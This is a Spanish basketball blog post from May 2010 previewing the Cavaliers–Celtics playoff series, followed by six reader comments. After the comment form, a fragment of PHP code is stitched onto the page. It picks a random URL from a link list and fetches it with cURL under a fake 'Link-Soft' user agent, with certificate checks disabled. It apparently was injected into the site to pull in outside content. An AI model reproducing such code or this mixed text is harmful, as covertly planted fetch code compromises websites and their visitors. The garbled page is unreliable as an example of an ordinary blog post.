Análisis Cleveland Cavaliers vs Boston Celtics

01 de May de 2010 por TheDeerHunter

Regular: 2-2

Cavs: 102.1 P. Favor (9º) – 95.6 P. Contra (5º)
Celtics: 99.2 P. Favor (19º) – 95.6 P. Contra (5º)

Cuantitativamente no se encuentran muchas razones objetivas para dar a los Celtics como víctimas de unos Cavs implacables. Sin embargo, no hay mucha gente que pronostique una victoria verde y en cambio sí los hay que auguran “la barrida” como primera pala de tierra encima de la tumba del proyecto. Hace varios meses que la opinión generalizada había borrado a los Celtics del grupo de candidatos. Entre medias, vimos el 4 de Abril cómo los Celtics les endosaban nada menos que 117 puntos en un partido en el que LeBron se salió y el resto jugó de lujo. Esta brillante victoria no les dejó de considerar sospechosos habituales, sin embargo.

La verdadera razón de todo esto es cualitativa. Nadie cree ya en Kevin Garnett, sin que éste haya tampoco disipado ninguna duda. La primera ronda tampoco ha dado el verdadero tono de ninguno de los dos contendientes. Apenas sabemos a ciencia cierta de lo que realmente son capaces de dar en un momento tan crítico de la temporada.

Claves de la eliminatoria:

Parar a LeBron o neutralizar al grupo: Si ha habido alguien que haya dado con la tecla de frenar activamente al Elegido en playoffs esos fueron los Celtics campeones de hace dos años y, con todo, él estuvo a un tris de eliminarlos. El año pasado Orlando optó por minimizar la aportació de sus compañeros y también tuvieron éxito. Éste año, los Celtics doblegaron a los Cavs tirando más de lo segundo que de lo primero. También hay que decir que LeBron es todavía mejor jugador que hace dos años y que sus compañeros tambien son superiores a los del pasado.

Incógnitas: El estado físico que serán capaces de desplegar Kevin Garnett y Shaq. El primero es más fundamental para su equipo que el segundo. En esta eliminatoria no creemos que nadie puede dejarse nada bajo la manga. Cuidado porque LeBron también llega tocado.

La aportación Rondo: Volvemos a insistir en que una de las presuntas debilidades de los Cavs podrían ser la dirección y el ritmo. Esto también se pudo comprobar en algún momento de la pasada eliminatoria. Los Celtics necesitarán la mejor versión de su base para pasar la eliminatoria.

Duelo de pizarras: Para mí Doc Rivers sigue siendo un factor diferencial. Hasta la fecha no me he podido crear la misma impresión acerca de Mike Brown, sin insinuar que es un mal técnico.

El factor cancha: Dos de las canchas más difíciles de toda la competición frente a frente. Sólo que en una pueden llegar a jugarse 4 partidos y en la otra a lo sumo 3.

Agenda:
– P1: Sábado 1 de Mayo a las 2h (Hora España todos
– P2: Lunes 3 de Mayo a las 2h
– P3: Viernes 7 de Mayo a la 1h
– P4: Domingo 9 a las 21:30h

Pronóstico: 4-3 Cleveland (pero no sé poqué me retumba la palabra Spurs en la cabeza)

Comenta

6 comentarios a esta entrada

  1. Love Denise dice:
    #1

    Espero equivocarme por el bien del espectáculo, pero creo que estos viejunos Celtics no tienen nada que hacer ante Cavs. No creo que haya un 6º partido en esta serie.

      Citar

  2. sergio dice:
    #2

    Denise, ten en cuenta que llevan dos partidos ganados por serie en casa desde hace tres años y un balance durante ese período de 10-10 en enfrentamientos directos. No creo que ganen la serie, pero el 6º partido creo que sí se disputara.

      Citar

  3. Mariano dice:
    #3

    No entendí lo que pusiste al final de los Spurs 😛 je, disculpas, ando medio perdido..

    explicame porfa 😉

    saludos.

      Citar

  4. Viva_Dirk dice:
    #4

    Mariano, supongo que tiene algo que ver con que ya se les daba por muertos antes de empezar los playoffs, por viejos y por falta de físico, y ambos han resuelto su primera ronda sin demasiadas dificultades y parece que pueden poner en apuros a cualquiera.

      Citar

  5. LEmontus dice:
    #5

    Está claro dar por muertos a un equipo que tiene a Allen y Pierce puede ser una locura, aunque obviamente ´yo creo que pasará Cavs , aunque tendrán problemas.

      Citar

  6. daniel dice:
    #6

    Cavaliers vs Celtics esa es una final claro esta pero nada Cleveland tiene mas potencial en mi opinion ya va 2 a 2 la ronda …’¡ de lujo … ‘¡’¡

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>